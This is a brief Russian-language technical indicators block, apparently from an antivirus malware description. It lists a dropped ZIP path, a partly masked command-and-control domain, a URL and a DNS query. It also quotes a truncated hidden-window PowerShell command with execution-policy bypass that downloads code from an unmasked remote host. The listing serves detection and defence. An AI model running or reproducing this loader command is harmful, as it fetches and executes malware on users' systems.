Техническая информация
- $emizqhdgjlcokoqqawdfhshzaxcc
- %APPDATA%\divx0\wah.zip
- 'lu####t68.online':80
- http://lu####t68.online/data.php?10###
- DNS ASK lu####t68.online
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Ex Bypass -NoP -C $EmIzQhDGJlcokOqQaWDfhsHZaxcC='http://lucabet68.online/data.php?10349';$oHZgbjjoEjLxQkVFfQfmltxKnvXL=(New-Object System.Net.WebClient).DownloadString($EmIzQhDGJlcokOqQaWDfhsH... (со скрытым окном)